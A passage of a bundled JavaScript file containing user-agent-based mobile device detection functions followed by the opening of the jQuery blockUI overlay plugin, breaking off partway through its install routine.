1347var isIphone = false;
1348var isAndroidPhone = false;
1349var isTierTablet = false;
1350var isTierIphone = false;
1351var isTierRichCss = false;
1352var isTierGenericMobile = false;
1353
1354var engineWebKit = "webkit";
1355var deviceIphone = "iphone";
1356var deviceIpod = "ipod";
1357var deviceIpad = "ipad";
1358var deviceMacPpc = "macintosh"; //Used for disambiguation
1359
1360var deviceAndroid = "android";
1361var deviceGoogleTV = "googletv";
1362var deviceXoom = "xoom"; //Motorola Xoom
1363var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
1364
1365var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
1366
1367var deviceSymbian = "symbian";
1368var deviceS60 = "series60";
1369var deviceS70 = "series70";
1370var deviceS80 = "series80";
1371var deviceS90 = "series90";
1372
1373var deviceWinPhone7 = "windows phone os 7";
1374var deviceWinMob = "windows ce";
1375var deviceWindows = "windows";
1376var deviceIeMob = "iemobile";
1377var devicePpc = "ppc"; //Stands for PocketPC
1378var enginePie = "wm5 pie"; //An old Windows Mobile
1379
1380var deviceBB = "blackberry";
1381var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
1382var deviceBBStorm = "blackberry95"; //Storm 1 and 2
1383var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
1384var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
1385var deviceBBTour = "blackberry96"; //Tour
1386var deviceBBCurve = "blackberry89"; //Curve 2
1387var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
1388var deviceBBTorch = "blackberry 98"; //Torch
1389var deviceBBPlaybook = "playbook"; //PlayBook tablet
1390
1391var devicePalm = "palm";
1392var deviceWebOS = "webos"; //For Palm's line of WebOS devices
1393var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
1394
1395var engineBlazer = "blazer"; //Old Palm browser
1396var engineXiino = "xiino";
1397
1398var deviceKindle = "kindle"; //Amazon Kindle, eInk one
1399var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
1400
1401var vndwap = "vnd.wap";
1402var wml = "wml";
1403
1404var deviceTablet = "tablet"; //Generic term for slate and tablet devices
1405var deviceBrew = "brew";
1406var deviceDanger = "danger";
1407var deviceHiptop = "hiptop";
1408var devicePlaystation = "playstation";
1409var deviceNintendoDs = "nitro";
1410var deviceNintendo = "nintendo";
1411var deviceWii = "wii";
1412var deviceXbox = "xbox";
1413var deviceArchos = "archos";
1414
1415var engineOpera = "opera"; //Popular browser
1416var engineNetfront = "netfront"; //Common embedded OS browser
1417var engineUpBrowser = "up.browser"; //common on some phones
1418var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
1419var deviceMidp = "midp"; //a mobile Java technology
1420var uplink = "up.link";
1421var engineTelecaQ = 'teleca q'; //a modern feature phone browser
1422
1423var devicePda = "pda";
1424var mini = "mini"; //Some mobile browsers put 'mini' in their names.
1425var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
1426var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
1427
1428var maemo = "maemo";
1429var linux = "linux";
1430var qtembedded = "qt embedded"; //for Sony Mylo and others
1431var mylocom2 = "com2"; //for Sony Mylo also
1432
1433var manuSonyEricsson = "sonyericsson";
1434var manuericsson = "ericsson";
1435var manuSamsung1 = "sec-sgh";
1436var manuSony = "sony";
1437var manuHtc = "htc"; //Popular Android and WinMo manufacturer
1438
1439var svcDocomo = "docomo";
1440var svcKddi = "kddi";
1441var svcVodafone = "vodafone";
1442
1443var disUpdate = "update"; //pda vs. update
1444
1445var uagent = "";
1446if (navigator && navigator.userAgent)
1447 uagent = navigator.userAgent.toLowerCase();
1448
1449function DetectIphone()
1450{
1451 if (uagent.search(deviceIphone) > -1)
1452 {
1453 if (DetectIpad() || DetectIpod())
1454 return false;
1455 else
1456 return true;
1457 }
1458 else
1459 return false;
1460}
1461
1462function DetectIpod()
1463{
1464 if (uagent.search(deviceIpod) > -1)
1465 return true;
1466 else
1467 return false;
1468}
1469
1470function DetectIpad()
1471{
1472 if (uagent.search(deviceIpad) > -1 && DetectWebkit())
1473 return true;
1474 else
1475 return false;
1476}
1477
1478function DetectIphoneOrIpod()
1479{
1480 if (uagent.search(deviceIphone) > -1 ||
1481 uagent.search(deviceIpod) > -1)
1482 return true;
1483 else
1484 return false;
1485}
1486
1487function DetectIos()
1488{
1489 if (DetectIphoneOrIpod() || DetectIpad())
1490 return true;
1491 else
1492 return false;
1493}
1494
1495function DetectAndroid()
1496{
1497 if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
1498 return true;
1499 if (uagent.search(deviceHtcFlyer) > -1)
1500 return true;
1501 else
1502 return false;
1503}
1504
1505function DetectAndroidPhone()
1506{
1507 if (DetectAndroid() && (uagent.search(mobile) > -1))
1508 return true;
1509 if (DetectOperaAndroidPhone())
1510 return true;
1511 if (uagent.search(deviceHtcFlyer) > -1)
1512 return true;
1513 else
1514 return false;
1515}
1516
1517function DetectAndroidTablet()
1518{
1519 if (!DetectAndroid())
1520 return false;
1521
1522 if (DetectOperaMobile())
1523 return false;
1524 if (uagent.search(deviceHtcFlyer) > -1)
1525 return false;
1526
1527 if (uagent.search(mobile) > -1)
1528 return false;
1529 else
1530 return true;
1531}
1532
1533
1534function DetectAndroidWebKit()
1535{
1536 if (DetectAndroid() && DetectWebkit())
1537 return true;
1538 else
1539 return false;
1540}
1541
1542
1543function DetectGoogleTV()
1544{
1545 if (uagent.search(deviceGoogleTV) > -1)
1546 return true;
1547 else
1548 return false;
1549}
1550
1551
1552function DetectWebkit()
1553{
1554 if (uagent.search(engineWebKit) > -1)
1555 return true;
1556 else
1557 return false;
1558}
1559
1560function DetectS60OssBrowser()
1561{
1562 if (DetectWebkit())
1563 {
1564 if ((uagent.search(deviceS60) > -1 ||
1565 uagent.search(deviceSymbian) > -1))
1566 return true;
1567 else
1568 return false;
1569 }
1570 else
1571 return false;
1572}
1573
1574function DetectSymbianOS()
1575{
1576 if (uagent.search(deviceSymbian) > -1 ||
1577 uagent.search(deviceS60) > -1 ||
1578 uagent.search(deviceS70) > -1 ||
1579 uagent.search(deviceS80) > -1 ||
1580 uagent.search(deviceS90) > -1)
1581 return true;
1582 else
1583 return false;
1584}
1585
1586function DetectWindowsPhone7()
1587{
1588 if (uagent.search(deviceWinPhone7) > -1)
1589 return true;
1590 else
1591 return false;
1592}
1593
1594function DetectWindowsMobile()
1595{
1596 if (DetectWindowsPhone7())
1597 return false;
1598 if (uagent.search(deviceWinMob) > -1 ||
1599 uagent.search(deviceIeMob) > -1 ||
1600 uagent.search(enginePie) > -1)
1601 return true;
1602 if ((uagent.search(devicePpc) > -1) &&
1603 !(uagent.search(deviceMacPpc) > -1))
1604 return true;
1605 if (uagent.search(manuHtc) > -1 &&
1606 uagent.search(deviceWindows) > -1)
1607 return true;
1608 else
1609 return false;
1610}
1611
1612function DetectBlackBerry()
1613{
1614 if (uagent.search(deviceBB) > -1)
1615 return true;
1616 if (uagent.search(vndRIM) > -1)
1617 return true;
1618 else
1619 return false;
1620}
1621
1622function DetectBlackBerryTablet()
1623{
1624 if (uagent.search(deviceBBPlaybook) > -1)
1625 return true;
1626 else
1627 return false;
1628}
1629
1630function DetectBlackBerryWebKit()
1631{
1632 if (DetectBlackBerry() &&
1633 uagent.search(engineWebKit) > -1)
1634 return true;
1635 else
1636 return false;
1637}
1638
1639function DetectBlackBerryTouch()
1640{
1641 if (DetectBlackBerry() &&
1642 ((uagent.search(deviceBBStorm) > -1) ||
1643 (uagent.search(deviceBBTorch) > -1) ||
1644 (uagent.search(deviceBBBoldTouch) > -1) ||
1645 (uagent.search(deviceBBCurveTouch) > -1) ))
1646 return true;
1647 else
1648 return false;
1649}
1650
1651function DetectBlackBerryHigh()
1652{
1653 if (DetectBlackBerryWebKit())
1654 return false;
1655 if (DetectBlackBerry())
1656 {
1657 if (DetectBlackBerryTouch() ||
1658 uagent.search(deviceBBBold) > -1 ||
1659 uagent.search(deviceBBTour) > -1 ||
1660 uagent.search(deviceBBCurve) > -1)
1661 return true;
1662 else
1663 return false;
1664 }
1665 else
1666 return false;
1667}
1668
1669function DetectBlackBerryLow()
1670{
1671 if (DetectBlackBerry())
1672 {
1673 if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
1674 return false;
1675 else
1676 return true;
1677 }
1678 else
1679 return false;
1680}
1681
1682
1683function DetectPalmOS()
1684{
1685 if (uagent.search(devicePalm) > -1 ||
1686 uagent.search(engineBlazer) > -1 ||
1687 uagent.search(engineXiino) > -1)
1688 {
1689 if (DetectPalmWebOS())
1690 return false;
1691 else
1692 return true;
1693 }
1694 else
1695 return false;
1696}
1697
1698function DetectPalmWebOS()
1699{
1700 if (uagent.search(deviceWebOS) > -1)
1701 return true;
1702 else
1703 return false;
1704}
1705
1706function DetectWebOSTablet()
1707{
1708 if (uagent.search(deviceWebOShp) > -1 &&
1709 uagent.search(deviceTablet) > -1)
1710 return true;
1711 else
1712 return false;
1713}
1714
1715function DetectGarminNuvifone()
1716{
1717 if (uagent.search(deviceNuvifone) > -1)
1718 return true;
1719 else
1720 return false;
1721}
1722
1723
1724function DetectSmartphone()
1725{
1726 if (DetectIphoneOrIpod()
1727 || DetectAndroidPhone()
1728 || DetectS60OssBrowser()
1729 || DetectSymbianOS()
1730 || DetectWindowsMobile()
1731 || DetectWindowsPhone7()
1732 || DetectBlackBerry()
1733 || DetectPalmWebOS()
1734 || DetectPalmOS()
1735 || DetectGarminNuvifone())
1736 return true;
1737
1738 return false;
1739};
1740
1741function DetectArchos()
1742{
1743 if (uagent.search(deviceArchos) > -1)
1744 return true;
1745 else
1746 return false;
1747}
1748
1749function DetectBrewDevice()
1750{
1751 if (uagent.search(deviceBrew) > -1)
1752 return true;
1753 else
1754 return false;
1755}
1756
1757function DetectDangerHiptop()
1758{
1759 if (uagent.search(deviceDanger) > -1 ||
1760 uagent.search(deviceHiptop) > -1)
1761 return true;
1762 else
1763 return false;
1764}
1765
1766function DetectMaemoTablet()
1767{
1768 if (uagent.search(maemo) > -1)
1769 return true;
1770 if ((uagent.search(linux) > -1)
1771 && (uagent.search(deviceTablet) > -1)
1772 && !DetectWebOSTablet()
1773 && !DetectAndroid())
1774 return true;
1775 else
1776 return false;
1777}
1778
1779function DetectSonyMylo()
1780{
1781 if (uagent.search(manuSony) > -1)
1782 {
1783 if (uagent.search(qtembedded) > -1 ||
1784 uagent.search(mylocom2) > -1)
1785 return true;
1786 else
1787 return false;
1788 }
1789 else
1790 return false;
1791}
1792
1793function DetectOperaMobile()
1794{
1795 if (uagent.search(engineOpera) > -1)
1796 {
1797 if (uagent.search(mini) > -1 ||
1798 uagent.search(mobi) > -1)
1799 return true;
1800 else
1801 return false;
1802 }
1803 else
1804 return false;
1805}
1806
1807function DetectOperaAndroidPhone()
1808{
1809 if ((uagent.search(engineOpera) > -1) &&
1810 (uagent.search(deviceAndroid) > -1) &&
1811 (uagent.search(mobi) > -1))
1812 return true;
1813 else
1814 return false;
1815}
1816
1817function DetectOperaAndroidTablet()
1818{
1819 if ((uagent.search(engineOpera) > -1) &&
1820 (uagent.search(deviceAndroid) > -1) &&
1821 (uagent.search(deviceTablet) > -1))
1822 return true;
1823 else
1824 return false;
1825}
1826
1827function DetectSonyPlaystation()
1828{
1829 if (uagent.search(devicePlaystation) > -1)
1830 return true;
1831 else
1832 return false;
1833};
1834
1835function DetectNintendo()
1836{
1837 if (uagent.search(deviceNintendo) > -1 ||
1838 uagent.search(deviceWii) > -1 ||
1839 uagent.search(deviceNintendoDs) > -1)
1840 return true;
1841 else
1842 return false;
1843};
1844
1845function DetectXbox()
1846{
1847 if (uagent.search(deviceXbox) > -1)
1848 return true;
1849 else
1850 return false;
1851};
1852
1853function DetectGameConsole()
1854{
1855 if (DetectSonyPlaystation())
1856 return true;
1857 if (DetectNintendo())
1858 return true;
1859 if (DetectXbox())
1860 return true;
1861 else
1862 return false;
1863};
1864
1865function DetectKindle()
1866{
1867 if (uagent.search(deviceKindle) > -1 &&
1868 !DetectAndroid())
1869 return true;
1870 else
1871 return false;
1872}
1873
1874function DetectAmazonSilk()
1875{
1876 if (uagent.search(engineSilk) > -1)
1877 return true;
1878 else
1879 return false;
1880}
1881
1882function DetectMobileQuick()
1883{
1884 if (DetectTierTablet())
1885 return false;
1886
1887 if (DetectSmartphone())
1888 return true;
1889
1890 if (uagent.search(deviceMidp) > -1 ||
1891 DetectBrewDevice())
1892 return true;
1893
1894 if (DetectOperaMobile())
1895 return true;
1896
1897 if (uagent.search(engineNetfront) > -1)
1898 return true;
1899 if (uagent.search(engineUpBrowser) > -1)
1900 return true;
1901 if (uagent.search(engineOpenWeb) > -1)
1902 return true;
1903
1904 if (DetectDangerHiptop())
1905 return true;
1906
1907 if (DetectMaemoTablet())
1908 return true;
1909 if (DetectArchos())
1910 return true;
1911
1912 if ((uagent.search(devicePda) > -1) &&
1913 !(uagent.search(disUpdate) > -1))
1914 return true;
1915 if (uagent.search(mobile) > -1)
1916 return true;
1917
1918 if (DetectKindle() ||
1919 DetectAmazonSilk())
1920 return true;
1921
1922 return false;
1923};
1924
1925
1926function DetectMobileLong()
1927{
1928 if (DetectMobileQuick())
1929 return true;
1930 if (DetectGameConsole())
1931 return true;
1932 if (DetectSonyMylo())
1933 return true;
1934
1935 if (uagent.search(manuSamsung1) > -1 ||
1936 uagent.search(manuSonyEricsson) > -1 ||
1937 uagent.search(manuericsson) > -1)
1938 return true;
1939
1940 if (uagent.search(svcDocomo) > -1)
1941 return true;
1942 if (uagent.search(svcKddi) > -1)
1943 return true;
1944 if (uagent.search(svcVodafone) > -1)
1945 return true;
1946
1947
1948 return false;
1949};
1950
1951
1952function DetectTierTablet()
1953{
1954 if (DetectIpad()
1955 || DetectAndroidTablet()
1956 || DetectBlackBerryTablet()
1957 || DetectWebOSTablet())
1958 return true;
1959 else
1960 return false;
1961};
1962
1963function DetectTierIphone()
1964{
1965 if (DetectIphoneOrIpod())
1966 return true;
1967 if (DetectAndroidPhone())
1968 return true;
1969 if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
1970 return true;
1971 if (DetectWindowsPhone7())
1972 return true;
1973 if (DetectPalmWebOS())
1974 return true;
1975 if (DetectGarminNuvifone())
1976 return true;
1977 else
1978 return false;
1979};
1980
1981function DetectTierRichCss()
1982{
1983 if (DetectMobileQuick())
1984 {
1985 if (DetectTierIphone() || DetectKindle())
1986 return false;
1987
1988 if (DetectWebkit())
1989 return true;
1990 if (DetectS60OssBrowser())
1991 return true;
1992
1993 if (DetectBlackBerryHigh())
1994 return true;
1995
1996 if (DetectWindowsMobile())
1997 return true;
1998
1999 if (uagent.search(engineTelecaQ) > -1)
2000 return true;
2001
2002 else
2003 return false;
2004 }
2005 else
2006 return false;
2007};
2008
2009function DetectTierOtherPhones()
2010{
2011 if (DetectMobileLong())
2012 {
2013 if (DetectTierIphone() || DetectTierRichCss())
2014 return false;
2015
2016 else
2017 return true;
2018 }
2019 else
2020 return false;
2021};
2022
2023
2024function InitDeviceScan()
2025{
2026 isIphone = DetectIphoneOrIpod();
2027 isAndroidPhone = DetectAndroidPhone();
2028 isTierIphone = DetectTierIphone();
2029 isTierTablet = DetectTierTablet();
2030
2031 isTierRichCss = DetectTierRichCss();
2032 isTierGenericMobile = DetectTierOtherPhones();
2033};
2034
2035try {
2036 InitDeviceScan();
2037}catch(e){}
2038
2039
2040/*!
2041 * jQuery blockUI plugin
2042 * Version 2.70.0-2014.11.23
2043 * Requires jQuery v1.7 or later
2044 *
2045 * Examples at: http://malsup.com/jquery/block/
2046 * Copyright (c) 2007-2013 M. Alsup
2047 * Dual licensed under the MIT and GPL licenses:
2048 * http://www.opensource.org/licenses/mit-license.php
2049 * http://www.gnu.org/licenses/gpl.html
2050 *
2051 * Thanks to Amir-Hossein Sobhi for some excellent contributions!
2052 */
2053
2054;(function() {
2055/*jshint eqeqeq:false curly:false latedef:false */
2056"use strict";
2057
2058 function setup($) {
2059 $.fn._fadeIn = $.fn.fadeIn;
2060
2061 var noOp = $.noop || function() {};
2062
2063 // this bit is to ensure we don't call setExpression when we shouldn't (with extra muscle to handle
2064 // confusing userAgent strings on Vista)
2065 var msie = /MSIE/.test(navigator.userAgent);
2066 var ie6 = /MSIE 6.0/.test(navigator.userAgent) && ! /MSIE 8.0/.test(navigator.userAgent);
2067 var mode = document.documentMode || 0;
2068 var setExpr = $.isFunction( document.createElement('div').style.setExpression );
2069
2070 // global $ methods for blocking/unblocking the entire page
2071 $.blockUI = function(opts) { install(window, opts); };
2072 $.unblockUI = function(opts) { remove(window, opts); };
2073
2074 // convenience method for quick growl-like notifications (http://www.google.com/search?q=growl)
2075 $.growlUI = function(title, message, timeout, onClose) {
2076 var $m = $('<div class="growlUI"></div>');
2077 if (title) $m.append('<h1>'+title+'</h1>');
2078 if (message) $m.append('<h2>'+message+'</h2>');
2079 if (timeout === undefined) timeout = 3000;
2080
2081 // Added by konapun: Set timeout to 30 seconds if this growl is moused over, like normal toast notifications
2082 var callBlock = function(opts) {
2083 opts = opts || {};
2084
2085 $.blockUI({
2086 message: $m,
2087 fadeIn : typeof opts.fadeIn !== 'undefined' ? opts.fadeIn : 700,
2088 fadeOut: typeof opts.fadeOut !== 'undefined' ? opts.fadeOut : 1000,
2089 timeout: typeof opts.timeout !== 'undefined' ? opts.timeout : timeout,
2090 centerY: false,
2091 showOverlay: false,
2092 onUnblock: onClose,
2093 css: $.blockUI.defaults.growlCSS
2094 });
2095 };
2096
2097 callBlock();
2098 var nonmousedOpacity = $m.css('opacity');
2099 $m.mouseover(function() {
2100 callBlock({
2101 fadeIn: 0,
2102 timeout: 30000
2103 });
2104
2105 var displayBlock = $('.blockMsg');
2106 displayBlock.stop(); // cancel fadeout if it has started
2107 displayBlock.fadeTo(300, 1); // make it easier to read the message by removing transparency
2108 }).mouseout(function() {
2109 $('.blockMsg').fadeOut(1000);
2110 });
2111 // End konapun additions
2112 };
2113
2114 // plugin method for blocking element content
2115 $.fn.block = function(opts) {
2116 if ( this[0] === window ) {
2117 $.blockUI( opts );
2118 return this;
2119 }
2120 var fullOpts = $.extend({}, $.blockUI.defaults, opts || {});
2121 this.each(function() {
2122 var $el = $(this);
2123 if (fullOpts.ignoreIfBlocked && $el.data('blockUI.isBlocked'))
2124 return;
2125 $el.unblock({ fadeOut: 0 });
2126 });
2127
2128 return this.each(function() {
2129 if ($.css(this,'position') == 'static') {
2130 this.style.position = 'relative';
2131 $(this).data('blockUI.static', true);
2132 }
2133 this.style.zoom = 1; // force 'hasLayout' in ie
2134 install(this, opts);
2135 });
2136 };
2137
2138 // plugin method for unblocking element content
2139 $.fn.unblock = function(opts) {
2140 if ( this[0] === window ) {
2141 $.unblockUI( opts );
2142 return this;
2143 }
2144 return this.each(function() {
2145 remove(this, opts);
2146 });
2147 };
2148
2149 $.blockUI.version = 2.70; // 2nd generation blocking at no extra cost!
2150
2151 // override these in your code to change the default behavior and style
2152 $.blockUI.defaults = {
2153 // message displayed when blocking (use null for no message)
2154 message: '<h1>Please wait...</h1>',
2155
2156 title: null, // title string; only used when theme == true
2157 draggable: true, // only used when theme == true (requires jquery-ui.js to be loaded)
2158
2159 theme: false, // set to true to use with jQuery UI themes
2160
2161 // styles for the message when blocking; if you wish to disable
2162 // these and use an external stylesheet then do this in your code:
2163 // $.blockUI.defaults.css = {};
2164 css: {
2165 padding: 0,
2166 margin: 0,
2167 width: '30%',
2168 top: '40%',
2169 left: '35%',
2170 textAlign: 'center',
2171 color: '#000',
2172 border: '3px solid #aaa',
2173 backgroundColor:'#fff',
2174 cursor: 'wait'
2175 },
2176
2177 // minimal style set used when themes are used
2178 themedCSS: {
2179 width: '30%',
2180 top: '40%',
2181 left: '35%'
2182 },
2183
2184 // styles for the overlay
2185 overlayCSS: {
2186 backgroundColor: '#000',
2187 opacity: 0.6,
2188 cursor: 'wait'
2189 },
2190
2191 // style to replace wait cursor before unblocking to correct issue
2192 // of lingering wait cursor
2193 cursorReset: 'default',
2194
2195 // styles applied when using $.growlUI
2196 growlCSS: {
2197 width: '350px',
2198 top: '10px',
2199 left: '',
2200 right: '10px',
2201 border: 'none',
2202 padding: '5px',
2203 opacity: 0.6,
2204 cursor: 'default',
2205 color: '#fff',
2206 backgroundColor: '#000',
2207 '-webkit-border-radius':'10px',
2208 '-moz-border-radius': '10px',
2209 'border-radius': '10px'
2210 },
2211
2212 // IE issues: 'about:blank' fails on HTTPS and javascript:false is s-l-o-w
2213 // (hat tip to Jorge H. N. de Vasconcelos)
2214 /*jshint scripturl:true */
2215 iframeSrc: /^https/i.test(window.location.href || '') ? 'javascript:false' : 'about:blank',
2216
2217 // force usage of iframe in non-IE browsers (handy for blocking applets)
2218 forceIframe: false,
2219
2220 // z-index for the blocking overlay
2221 baseZ: 1000,
2222
2223 // set these to true to have the message automatically centered
2224 centerX: true, // <-- only effects element blocking (page block controlled via css above)
2225 centerY: true,
2226
2227 // allow body element to be stetched in ie6; this makes blocking look better
2228 // on "short" pages. disable if you wish to prevent changes to the body height
2229 allowBodyStretch: true,
2230
2231 // enable if you want key and mouse events to be disabled for content that is blocked
2232 bindEvents: true,
2233
2234 // be default blockUI will supress tab navigation from leaving blocking content
2235 // (if bindEvents is true)
2236 constrainTabKey: true,
2237
2238 // fadeIn time in millis; set to 0 to disable fadeIn on block
2239 fadeIn: 200,
2240
2241 // fadeOut time in millis; set to 0 to disable fadeOut on unblock
2242 fadeOut: 400,
2243
2244 // time in millis to wait before auto-unblocking; set to 0 to disable auto-unblock
2245 timeout: 0,
2246
2247 // disable if you don't want to show the overlay
2248 showOverlay: true,
2249
2250 // if true, focus will be placed in the first available input field when
2251 // page blocking
2252 focusInput: true,
2253
2254 // elements that can receive focus
2255 focusableElements: ':input:enabled:visible',
2256
2257 // suppresses the use of overlay styles on FF/Linux (due to performance issues with opacity)
2258 // no longer needed in 2012
2259 // applyPlatformOpacityRules: true,
2260
2261 // callback method invoked when fadeIn has completed and blocking message is visible
2262 onBlock: null,
2263
2264 // callback method invoked when unblocking has completed; the callback is
2265 // passed the element that has been unblocked (which is the window object for page
2266 // blocks) and the options that were passed to the unblock call:
2267 // onUnblock(element, options)
2268 onUnblock: null,
2269
2270 // callback method invoked when the overlay area is clicked.
2271 // setting this will turn the cursor to a pointer, otherwise cursor defined in overlayCss will be used.
2272 onOverlayClick: null,
2273
2274 // don't ask; if you really must know: http://groups.google.com/group/jquery-en/browse_thread/thread/36640a8730503595/2f6a79a77a78e493#2f6a79a77a78e493
2275 quirksmodeOffsetHack: 4,
2276
2277 // class name of the message block
2278 blockMsgClass: 'blockMsg',
2279
2280 // if it is already blocked, then ignore it (don't unblock and reblock)
2281 ignoreIfBlocked: false
2282 };
2283
2284 // private data and functions follow...
2285
2286 var pageBlock = null;
2287 var pageBlockEls = [];
2288
2289 function install(el, opts) {
2290 var css, themedCSS;
2291 var full = (el == window);
2292 var msg = (opts && opts.message !== undefined ? opts.message : undefined);
2293 opts = $.extend({}, $.blockUI.defaults, opts || {});
2294
2295 if (opts.ignoreIfBlocked && $(el).data('blockUI.isBlocked'))
2296 return;
2297
2298 opts.overlayCSS = $.extend({}, $.blockUI.defaults.overlayCSS, opts.overlayCSS || {});
2299 css = $.extend({}, $.blockUI.defaults.css, opts.css || {});
2300 if (opts.onOverlayClick)
2301 opts.overlayCSS.cursor = 'pointer';
2302
2303 themedCSS = $.extend({}, $.blockUI.defaults.themedCSS, opts.themedCSS || {});
2304 msg = msg === undefined ? opts.message : msg;
2305
2306 // remove the current block (if there is one)
2307 if (full && pageBlock)
2308 remove(window, {fadeOut:0});
2309
2310 // if an existing element is being used as the blocking content then we capture
2311 // its current place in the DOM (and current display style) so we can restore
2312 // it when we unblock
2313 if (msg && typeof msg != 'string' && (msg.parentNode || msg.jquery)) {
2314 var node = msg.jquery ? msg[0] : msg;
2315 var data = {};
2316 $(el).data('blockUI.history', data);
2317 data.el = node;
2318 data.parent = node.parentNode;
2319 data.display = node.style.display;
2320 data.position = node.style.position;
2321 if (data.parent)
2322 data.parent.removeChild(node);
2323 }
2324
2325 $(el).data('blockUI.onUnblock', opts.onUnblock);
2326 var z = opts.baseZ;
2327
2328 // blockUI uses 3 layers for blocking, for simplicity they are all used on every platform;
2329 // layer1 is the iframe layer which is used to supress bleed through of underlying content
2330 // layer2 is the overlay layer which has opacity and a wait cursor (by default)
2331 // layer3 is the message content that is displayed while blocking
2332 var lyr1, lyr2, lyr3, s;
2333 if (msie || opts.forceIframe)
2334 lyr1 = $('<iframe class="blockUI" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;position:absolute;width:100%;height:100%;top:0;left:0" src="'+opts.iframeSrc+'"></iframe>');
2335 else
2336 lyr1 = $('<div class="blockUI" style="display:none"></div>');
2337
2338 if (opts.theme)
2339 lyr2 = $('<div class="blockUI blockOverlay ui-widget-overlay" style="z-index:'+ (z++) +';display:none"></div>');
2340 else
2341 lyr2 = $('<div class="blockUI blockOverlay" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;width:100%;height:100%;top:0;left:0"></div>');
2342
2343 if (opts.theme && full) {
2344 s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:fixed">';
2345 if ( opts.title ) {
2346 s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || ' ')+'</div>';
2347 }
2348 s += '<div class="ui-widget-content ui-dialog-content"></div>';
2349 s += '</div>';
2350 }
2351 else if (opts.theme) {
2352 s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:absolute">';
2353 if ( opts.title ) {
2354 s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || ' ')+'</div>';
2355 }
2356 s += '<div class="ui-widget-content ui-dialog-content"></div>';
2357 s += '</div>';
2358 }
2359 else if (full) {
2360 s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage" style="z-index:'+(z+10)+';display:none;position:fixed"></div>';
2361 }
2362 else {
2363 s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement" style="z-index:'+(z+10)+';display:none;position:absolute"></div>';
2364 }
2365 lyr3 = $(s);
2366
2367 // if we have a message, style it
2368 if (msg) {
2369 if (opts.theme) {
2370 lyr3.css(themedCSS);
2371 lyr3.addClass('ui-widget-content');
2372 }
2373 else
2374 lyr3.css(css);
2375 }
2376
2377 // style the overlay
2378 if (!opts.theme /*&& (!opts.applyPlatformOpacityRules)*/)
2379 lyr2.css(opts.overlayCSS);
2380 lyr2.css('position', full ? 'fixed' : 'absolute');
2381
2382 // make iframe layer transparent in IE
2383 if (msie || opts.forceIframe)
2384 lyr1.css('opacity',0.0);
2385
2386 //$([lyr1[0],lyr2[0],lyr3[0]]).appendTo(full ? 'body' : el);
2387 var layers = [lyr1,lyr2,lyr3], $par = full ? $('body') : $(el);
2388 $.each(layers, function() {
2389 this.appendTo($par);
2390 });
2391
2392 if (opts.theme && opts.draggable && $.fn.draggable) {
2393 lyr3.draggable({
2394 handle: '.ui-dialog-titlebar',
2395 cancel: 'li'
2396 });
2397 }
2398
2399 // ie7 must use absolute positioning in quirks mode and to account for activex issues (when scrolling)
2400 var expr = setExpr && (!$.support.boxModel || $('object,embed', full ? null : el).length > 0);
2401 if (ie6 || expr) {
2402 // give body 100% height
2403 if (full && opts.allowBodyStretch && $.support.boxModel)
2404 $('html,body').css('height','100%');
2405
2406 // fix ie6 issue when blocked element has a border width
2407 if ((ie6 || !$.support.boxModel) && !full) {
2408 var t = sz(el,'borderTopWidth'), l = sz(el,'borderLeftWidth');
2409 var fixT = t ? '(0 - '+t+')' : 0;
2410 var fixL = l ? '(0 - '+l+')' : 0;
2411 }
2412
2413 // simulate fixed position
2414 $.each(layers, function(i,o) {
2415 var s = o[0].style;
2416 s.position = 'absolute';
2417 if (i < 2) {
2418 if (full)
2419 s.setExpression('height','Math.max(document.body.scrollHeight, document.body.offsetHeight) - (jQuery.support.boxModel?0:'+opts.quirksmodeOffsetHack+') + "px"');
2420 else
2421 s.setExpression('height','this.parentNode.offsetHeight + "px"');
2422 if (full)
2423 s.setExpression('width','jQuery.support.boxModel && document.documentElement.clientWidth || document.body.clientWidth + "px"');
2424 else
2425 s.setExpression('width','this.parentNode.offsetWidth + "px"');
2426 if (fixL) s.setExpression('left', fixL);
2427 if (fixT) s.setExpression('top', fixT);
2428 }
2429 else if (opts.centerY) {
2430 if (full) s.setExpression('top','(document.documentElement.clientHeight || document.body.clientHeight) / 2 - (this.offsetHeight / 2) + (blah = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"');
2431 s.marginTop = 0;
2432 }
2433 else if (!opts.centerY && full) {
2434 var top = (opts.css && opts.css.top) ? parseInt(opts.css.top, 10) : 0;
2435 var expression = '((document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + '+top+') + "px"';
2436 s.setExpression('top',expression);
2437 }
2438 });
2439 }
2440
2441 // show the message
2442 if (msg) {
2443 if (opts.theme)
2444 lyr3.find('.ui-widget-content').append(msg);
2445 else
2446 lyr3.append(msg);
2447 if (msg.jquery || msg.nodeType)
2448 $(msg).show();
2449 }
2450
2451 if ((msie || opts.forceIframe) && opts.showOverlay)
2452 lyr1.show(); // opacity is zero
2453 if (opts.fadeIn) {
2454 var cb = opts.onBlock ? opts.onBlock : noOp;
2455 var cb1 = (opts.showOverlay && !msg) ? cb : noOp;
2456 var cb2 = msg ? cb : noOp;
2457 if (opts.showOverlay)
